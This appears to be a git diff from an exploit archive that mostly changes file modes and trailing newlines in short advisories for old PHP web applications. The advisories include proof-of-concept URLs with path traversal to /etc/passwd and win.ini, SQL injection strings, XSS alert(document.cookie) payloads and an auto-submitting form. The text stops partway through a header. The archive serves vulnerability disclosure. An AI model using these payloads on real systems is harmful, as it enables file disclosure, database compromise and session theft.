100644 index f2e696624..3ad1e63d4 --- a/platforms/php/webapps/35632.txt +++ b/platforms/php/webapps/35632.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view arbitrary local files within XOOPS 2.5.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/imagemanager.php?target=/../../../../../../../../boot.ini%00&op=upload \ No newline at end of file +http://www.example.com/[path]/imagemanager.php?target=/../../../../../../../../boot.ini%00&op=upload \ No newline at end of file diff --git a/platforms/php/webapps/35633.txt b/platforms/php/webapps/35633.txt old mode 100755 new mode 100644 index 66bb4aea7..533473825 --- a/platforms/php/webapps/35633.txt +++ b/platforms/php/webapps/35633.txt @@ -5,4 +5,4 @@ Ultra Marketing Enterprises CMS and Cart is prone to multiple SQL-injection vuln A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/index.php?id=[Sql Injection] -http://www.example.com/product.php?id=[Sql Injection] \ No newline at end of file +http://www.example.com/product.php?id=[Sql Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35634.txt b/platforms/php/webapps/35634.txt old mode 100755 new mode 100644 index 0052c1bbd..ab8c537ea --- a/platforms/php/webapps/35634.txt +++ b/platforms/php/webapps/35634.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc WP-StarsRateBox 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/wp-starsratebox/wp-starsratebox.php?p=1&j=SQL_CODE_HERE \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-starsratebox/wp-starsratebox.php?p=1&j=SQL_CODE_HERE \ No newline at end of file diff --git a/platforms/php/webapps/35635.txt b/platforms/php/webapps/35635.txt old mode 100755 new mode 100644 index 0994ff90b..415393885 --- a/platforms/php/webapps/35635.txt +++ b/platforms/php/webapps/35635.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Dalbum 1.43 is vulnerable; other versions may also be affected. -http://www.example.com/editini.php?album=/Sample%20album/&url=[xss] \ No newline at end of file +http://www.example.com/editini.php?album=/Sample%20album/&url=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35636.txt b/platforms/php/webapps/35636.txt old mode 100755 new mode 100644 index a08eb9510..9932e17c5 --- a/platforms/php/webapps/35636.txt +++ b/platforms/php/webapps/35636.txt @@ -4,4 +4,4 @@ ChatLakTurk PHP Botlu Video is prone to a cross-site scripting vulnerability bec An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/ara.php?ara=[xss] \ No newline at end of file +http://www.example.com/ara.php?ara=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35643.txt b/platforms/php/webapps/35643.txt old mode 100755 new mode 100644 index babf7c603..3915463f8 --- a/platforms/php/webapps/35643.txt +++ b/platforms/php/webapps/35643.txt @@ -11,4 +11,4 @@ http://www.example.com/index.php?site=newsletter&pass=1%22%3E%3Cimg%20src=1.png% http://www.example.com/index.php?site=messenger&action=touser&touser=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E http://www.example.com/admin/admincenter.php?site=users&action=addtoclan&id=1&page=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E http://www.example.com/admin/admincenter.php?site=squads&action=edit&squadID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E -http://www.example.com/admin/admincenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E \ No newline at end of file +http://www.example.com/admin/admincenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E \ No newline at end of file diff --git a/platforms/php/webapps/35645.txt b/platforms/php/webapps/35645.txt old mode 100755 new mode 100644 index 0bc8a9eb8..c530be251 --- a/platforms/php/webapps/35645.txt +++ b/platforms/php/webapps/35645.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Automagick Tube Script 1.4.4 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?module=<script>alert(8888)</script> \ No newline at end of file +http://www.example.com/index.php?module=<script>alert(8888)</script> \ No newline at end of file diff --git a/platforms/php/webapps/35647.txt b/platforms/php/webapps/35647.txt old mode 100755 new mode 100644 index 90aae918a..7ce389b84 --- a/platforms/php/webapps/35647.txt +++ b/platforms/php/webapps/35647.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to obtain potentially sensitive in http://www.example.com/index.php?menu=../../../proc/self/environ -http://www.example.com/index1.php?menu=../../../etc/passwd \ No newline at end of file +http://www.example.com/index1.php?menu=../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/35648.txt b/platforms/php/webapps/35648.txt old mode 100755 new mode 100644 index dbd2d615e..9dcb34fec --- a/platforms/php/webapps/35648.txt +++ b/platforms/php/webapps/35648.txt @@ -8,4 +8,4 @@ Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected. http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E -http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E \ No newline at end of file +http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35649.txt b/platforms/php/webapps/35649.txt old mode 100755 new mode 100644 index be3ebc212..822a2dae7 --- a/platforms/php/webapps/35649.txt +++ b/platforms/php/webapps/35649.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow todoyu 2.0.8 is vulnerable; other versions may also be affected. -http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file +http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35651.txt b/platforms/php/webapps/35651.txt old mode 100755 new mode 100644 index c448ee9fc..4402ea166 --- a/platforms/php/webapps/35651.txt +++ b/platforms/php/webapps/35651.txt @@ -10,4 +10,4 @@ Dolibarr 3.0.0 is vulnerable; other versions may also be affected. http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E -http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file +http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/35653.txt b/platforms/php/webapps/35653.txt old mode 100755 new mode 100644 index 4d2618199..52721e038 --- a/platforms/php/webapps/35653.txt +++ b/platforms/php/webapps/35653.txt @@ -11,4 +11,4 @@ Nuke Evolution Xtreme 2.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5-- http://www.example.com/[path]/modules.php?name=News&file=../../../../../../../../../../etc/passwd%00 -http://www.example.com/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/35655.txt b/platforms/php/webapps/35655.txt old mode 100755 new mode 100644 index ce32d849f..c37899192 --- a/platforms/php/webapps/35655.txt +++ b/platforms/php/webapps/35655.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TemaTres 1.3 is vulnerable; prior versions may also be affected. -http://www.example.com/tematres1.3/vocab/index.php?_search_expresions=[xss] \ No newline at end of file +http://www.example.com/tematres1.3/vocab/index.php?_search_expresions=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35657.php b/platforms/php/webapps/35657.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35658.txt b/platforms/php/webapps/35658.txt old mode 100755 new mode 100644 index a90700b6c..bc5681cfc --- a/platforms/php/webapps/35658.txt +++ b/platforms/php/webapps/35658.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow html-edit CMS 3.1.9 is vulnerable; other versions may also be affected. -http://www.example.com/[Path]/addons/image_slider/index.php?html_output=[XSS] \ No newline at end of file +http://www.example.com/[Path]/addons/image_slider/index.php?html_output=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35659.txt b/platforms/php/webapps/35659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35662.txt b/platforms/php/webapps/35662.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35663.txt b/platforms/php/webapps/35663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35664.txt b/platforms/php/webapps/35664.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35665.txt b/platforms/php/webapps/35665.txt old mode 100755 new mode 100644 index c90197889..3c8ccfb81 --- a/platforms/php/webapps/35665.txt +++ b/platforms/php/webapps/35665.txt @@ -4,4 +4,4 @@ PHP F1 Max's Photo Album is prone to a cross-site scripting vulnerability becaus An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/showimage.php?id=[XSS] \ No newline at end of file +http://www.example.com/showimage.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35666.txt b/platforms/php/webapps/35666.txt old mode 100755 new mode 100644 index cf932a331..7837cb86a --- a/platforms/php/webapps/35666.txt +++ b/platforms/php/webapps/35666.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to compromise the application, access or m Football Website Manager 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/profile.php?fileId=[SQL Injection] \ No newline at end of file +http://www.example.com/profile.php?fileId=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35667.txt b/platforms/php/webapps/35667.txt old mode 100755 new mode 100644 index 002131175..38c761cad --- a/platforms/php/webapps/35667.txt +++ b/platforms/php/webapps/35667.txt @@ -12,4 +12,4 @@ The following components are vulnerable: Other components may also be affected. http://www.example.com/[Path]/index.php?option=com_users&task=profile&user=11+AND+1=0 -http://www.example.com/[Path]/index.php?option=com_frontpage&Itemid=1&limit=4&limitstart=[SQL-Inj3cT-Here] \ No newline at end of file +http://www.example.com/[Path]/index.php?option=com_frontpage&Itemid=1&limit=4&limitstart=[SQL-Inj3cT-Here] \ No newline at end of file diff --git a/platforms/php/webapps/35668.txt b/platforms/php/webapps/35668.txt old mode 100755 new mode 100644 index f72f820d5..5be778363 --- a/platforms/php/webapps/35668.txt +++ b/platforms/php/webapps/35668.txt @@ -11,4 +11,4 @@ http://www.example.com:9999/index.php?userid=admin &password=admin &confirmPassword=admin &adminEmail=admin () admin -&monitorEmail=admin () admin \ No newline at end of file +&monitorEmail=admin () admin \ No newline at end of file diff --git a/platforms/php/webapps/35670.txt b/platforms/php/webapps/35670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35673.txt b/platforms/php/webapps/35673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35674.txt b/platforms/php/webapps/35674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35675.txt b/platforms/php/webapps/35675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35677.txt b/platforms/php/webapps/35677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35678.txt b/platforms/php/webapps/35678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35679.txt b/platforms/php/webapps/35679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3568.txt b/platforms/php/webapps/3568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35680.txt b/platforms/php/webapps/35680.txt old mode 100755 new mode 100644 index 90543f66c..cf3753ec6 --- a/platforms/php/webapps/35680.txt +++ b/platforms/php/webapps/35680.txt @@ -10,4 +10,4 @@ http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/php/connector http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/test.html http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/uploadtest.html http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/browser.html -http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/frmupload.html \ No newline at end of file +http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/frmupload.html \ No newline at end of file diff --git a/platforms/php/webapps/35682.txt b/platforms/php/webapps/35682.txt old mode 100755 new mode 100644 index 0340573db..6f4c1294c --- a/platforms/php/webapps/35682.txt +++ b/platforms/php/webapps/35682.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Tine 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/tine/library/vcardphp/vbook.php?file=<script>alert(0)</script> \ No newline at end of file +http://www.example.com/tine/library/vcardphp/vbook.php?file=<script>alert(0)</script> \ No newline at end of file diff --git a/platforms/php/webapps/35684.txt b/platforms/php/webapps/35684.txt old mode 100755 new mode 100644 index 8f29fbed0..4d9268059 --- a/platforms/php/webapps/35684.txt +++ b/platforms/php/webapps/35684.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow LDAP Account Manager 3.4.0 is vulnerable; other versions may also be affected. -http://www.example.com/ldap-account-manager-3.4.0/templates/login.php?selfserviceSaveOk=[XSS] \ No newline at end of file +http://www.example.com/ldap-account-manager-3.4.0/templates/login.php?selfserviceSaveOk=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35691.txt b/platforms/php/webapps/35691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35697.txt b/platforms/php/webapps/35697.txt old mode 100755 new mode 100644 index d536febf1..04f80b430 --- a/platforms/php/webapps/35697.txt +++ b/platforms/php/webapps/35697.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Web Auction 0.3.6 is vulnerable; other versions may also be affected. -http://www.example.com/webauction-0.3.6/dataface/lib/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)// \ No newline at end of file +http://www.example.com/webauction-0.3.6/dataface/lib/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)// \ No newline at end of file diff --git a/platforms/php/webapps/35699.txt b/platforms/php/webapps/35699.txt old mode 100755 new mode 100644 index b26819297..a2c8a6c09 --- a/platforms/php/webapps/35699.txt +++ b/platforms/php/webapps/35699.txt @@ -4,4 +4,4 @@ E2 Photo Gallery is prone to a cross-site scripting vulnerability because it fai An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/uploader/index.php/[xss] \ No newline at end of file +http://www.example.com/uploader/index.php/[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35700.txt b/platforms/php/webapps/35700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35701.txt b/platforms/php/webapps/35701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35702.txt b/platforms/php/webapps/35702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35704.txt b/platforms/php/webapps/35704.txt old mode 100755 new mode 100644 index 1416de13f..1d326076e --- a/platforms/php/webapps/35704.txt +++ b/platforms/php/webapps/35704.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WP Ajax Calendar 1.0 is vulnerability; other versions may also be affected. -http://www.example.com/example.php?y=[xss] \ No newline at end of file +http://www.example.com/example.php?y=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35705.txt b/platforms/php/webapps/35705.txt old mode 100755 new mode 100644 index 7ae1f98e9..8f9e4d7c2 --- a/platforms/php/webapps/35705.txt +++ b/platforms/php/webapps/35705.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP Directory Listing script 3.1 is vulnerable; prior versions may also be affected. -http://www.example.com/index.php/[xss] \ No newline at end of file +http://www.example.com/index.php/[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35708.txt b/platforms/php/webapps/35708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35709.txt b/platforms/php/webapps/35709.txt old mode 100755 new mode 100644 index 70ca0f16c..a859f8b13 --- a/platforms/php/webapps/35709.txt +++ b/platforms/php/webapps/35709.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc e107 0.7.25 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/news.php?extend.9999999%0aAND%0aSUBSTRING(@@version,1,1)=5 \ No newline at end of file +http://www.example.com/[path]/news.php?extend.9999999%0aAND%0aSUBSTRING(@@version,1,1)=5 \ No newline at end of file diff --git a/platforms/php/webapps/35713.txt b/platforms/php/webapps/35713.txt old mode 100755 new mode 100644 index ea3e9630c..c4a463196 --- a/platforms/php/webapps/35713.txt +++ b/platforms/php/webapps/35713.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to upload arbitrary code and run it in the co FestOS 2.3c is vulnerable; other versions may also be affected. -http://www.example.com/[path]/admin/includes/tiny_mce/plugins/tinybrowser/upload.php \ No newline at end of file +http://www.example.com/[path]/admin/includes/tiny_mce/plugins/tinybrowser/upload.php \ No newline at end of file diff --git a/platforms/php/webapps/35715.txt b/platforms/php/webapps/35715.txt old mode 100755 new mode 100644 index 4ec651444..95e8df7ce --- a/platforms/php/webapps/35715.txt +++ b/platforms/php/webapps/35715.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow encoder 0.4.10 is vulnerable; other versions may also be affected. -http://www.example.com/ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&path=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&file=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&path=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&file=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35716.html b/platforms/php/webapps/35716.html old mode 100755 new mode 100644 index 5f509b185..921017c63 --- a/platforms/php/webapps/35716.html +++ b/platforms/php/webapps/35716.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Ampache 3.5.4 is vulnerable; other versions may also be affected. -<html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/ampache-3.5.4/login.php"> <input type="hidden" name="username" value=""><script>alert(0)</script>" /> </form> </body> </html> \ No newline at end of file +<html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/ampache-3.5.4/login.php"> <input type="hidden" name="username" value=""><script>alert(0)</script>" /> </form> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/35717.txt b/platforms/php/webapps/35717.txt old mode 100755 new mode 100644 index f0ac59b4b..a4c7d4629 --- a/platforms/php/webapps/35717.txt +++ b/platforms/php/webapps/35717.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to upload arbitrary files onto the webserve Exponent CMS 2.0.0 beta 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/exponent/content_selector.php?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00&section=&action= \ No newline at end of file +http://www.example.com/exponent/content_selector.php?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00&section=&action= \ No newline at end of file diff --git a/platforms/php/webapps/35718.txt b/platforms/php/webapps/35718.txt old mode 100755 new mode 100644 index 35b72ce78..17b33ff46 --- a/platforms/php/webapps/35718.txt +++ b/platforms/php/webapps/35718.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Gelsheet 1.02 is vulnerable; other versions may also be affected. -http://www.example.com/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file +http://www.example.com/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35720.txt b/platforms/php/webapps/35720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35722.txt b/platforms/php/webapps/35722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35723.txt b/platforms/php/webapps/35723.txt old mode 100755 new mode 100644 index c12ff70f9..e097ad2ad --- a/platforms/php/webapps/35723.txt +++ b/platforms/php/webapps/35723.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce TCExam 11.1.029 is vulnerable; other versions may also be affected. -http://www.example.com/tcexam/admin/code/tce_xml_user_results.php?lang=&user_id=1&startdate=[SQL]&enddate=[SQL]&order_field=[SQL] \ No newline at end of file +http://www.example.com/tcexam/admin/code/tce_xml_user_results.php?lang=&user_id=1&startdate=[SQL]&enddate=[SQL]&order_field=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/35724.txt b/platforms/php/webapps/35724.txt old mode 100755 new mode 100644 index 31790f4fd..9e199dc87 --- a/platforms/php/webapps/35724.txt +++ b/platforms/php/webapps/35724.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc EmbryoCore 1.03 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/index.php?page=[-!Blind SQLi Here!-] \ No newline at end of file +http://www.example.com/[path]/index.php?page=[-!Blind SQLi Here!-] \ No newline at end of file diff --git a/platforms/php/webapps/35727.txt b/platforms/php/webapps/35727.txt old mode 100755 new mode 100644 index 68117fbdb..86715c602 --- a/platforms/php/webapps/35727.txt +++ b/platforms/php/webapps/35727.txt @@ -4,4 +4,4 @@ HOMEPIMA Design is prone to a local file-disclosure vulnerability because it fai Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. -http://www.example.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/35730.txt b/platforms/php/webapps/35730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35733.txt b/platforms/php/webapps/35733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35734.txt b/platforms/php/webapps/35734.txt old mode 100755 new mode 100644 index 20421a731..071257b1c --- a/platforms/php/webapps/35734.txt +++ b/platforms/php/webapps/35734.txt @@ -12,4 +12,4 @@ The following example request is available: <input name="nick" type="text" id="nick" value="'SQL+CODE+HERE" /> <input name="pwd" id="pwd" type="password" value="adminpwd" /> <input name="submit" type="submit" class="submit_login" value="Login" /> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/35736.txt b/platforms/php/webapps/35736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35737.txt b/platforms/php/webapps/35737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35739.txt b/platforms/php/webapps/35739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35745.txt b/platforms/php/webapps/35745.txt old mode 100755 new mode 100644 index 79614380c..441645f3e --- a/platforms/php/webapps/35745.txt +++ b/platforms/php/webapps/35745.txt @@ -5,4 +5,4 @@ The 'com_cbcontact' component for Joomla! is prone to an SQL-injection vulnerabi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_cbcontact&task=vcard&contact_id=-11[SQLi] -http://www.example.com/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35752.txt b/platforms/php/webapps/35752.txt old mode 100755 new mode 100644 index f34203137..bc466af91 --- a/platforms/php/webapps/35752.txt +++ b/platforms/php/webapps/35752.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a 'com_docman' 1.3 is vulnerable. http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=-11[SQLi] -http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=15&limitstart=-11[SQLi] \ No newline at end of file +http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=15&limitstart=-11[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35754.txt b/platforms/php/webapps/35754.txt old mode 100755 new mode 100644 index b36de1815..5fcbea1d3 --- a/platforms/php/webapps/35754.txt +++ b/platforms/php/webapps/35754.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow allocPSA 1.7.4 is vulnerable; other versions may also be affected. -http://www.example.com/allocPSA-1.7.4/login/login.php?sessID=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file +http://www.example.com/allocPSA-1.7.4/login/login.php?sessID=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35755.txt b/platforms/php/webapps/35755.txt old mode 100755 new mode 100644 index 77c5f6c61..f867e59c5 --- a/platforms/php/webapps/35755.txt +++ b/platforms/php/webapps/35755.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow DocMGR 1.1.2 is vulnerable; other versions may also be affected. -http://www.example.com/docmgr/history.php?f=0%22%29;}alert%280%29;{// \ No newline at end of file +http://www.example.com/docmgr/history.php?f=0%22%29;}alert%280%29;{// \ No newline at end of file diff --git a/platforms/php/webapps/35756.txt b/platforms/php/webapps/35756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35757.txt b/platforms/php/webapps/35757.txt old mode 100755 new mode 100644 index 4dcd30d1d..0c59b4d80 --- a/platforms/php/webapps/35757.txt +++ b/platforms/php/webapps/35757.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. -http://www.example.com/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file +http://www.example.com/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/35759.txt b/platforms/php/webapps/35759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35760.txt b/platforms/php/webapps/35760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35761.txt b/platforms/php/webapps/35761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35767.txt b/platforms/php/webapps/35767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35782.txt b/platforms/php/webapps/35782.txt old mode 100755 new mode 100644 index fcb03e8ce..768601990 --- a/platforms/php/webapps/35782.txt +++ b/platforms/php/webapps/35782.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Room Juice 0.3.3 is vulnerable; other versions may also be affected. -http://www.example.com/roomjuice-0.3.3/display.php?filename=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file +http://www.example.com/roomjuice-0.3.3/display.php?filename=%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35783.html b/platforms/php/webapps/35783.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35787.txt b/platforms/php/webapps/35787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35788.txt b/platforms/php/webapps/35788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35789.txt b/platforms/php/webapps/35789.txt old mode 100755 new mode 100644 index 8086853d9..44d12ec75 --- a/platforms/php/webapps/35789.txt +++ b/platforms/php/webapps/35789.txt @@ -10,4 +10,4 @@ http://www.example.com/forgot_pwd.php/[xss] http://www.example.com/index.php/[xss] http://www.example.com/register.php/[xss] http://www.example.com/roschedule.php/[xss] -http://www.example.com/popCalendar.php?scheduleid=[xss] \ No newline at end of file +http://www.example.com/popCalendar.php?scheduleid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35791.txt b/platforms/php/webapps/35791.txt old mode 100755 new mode 100644 index 605e9115a..393573b36 --- a/platforms/php/webapps/35791.txt +++ b/platforms/php/webapps/35791.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Ajax Chat 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/ajax-chat/ajax-chat.php?chat_path=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/ajax-chat/ajax-chat.php?chat_path=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35796.txt b/platforms/php/webapps/35796.txt old 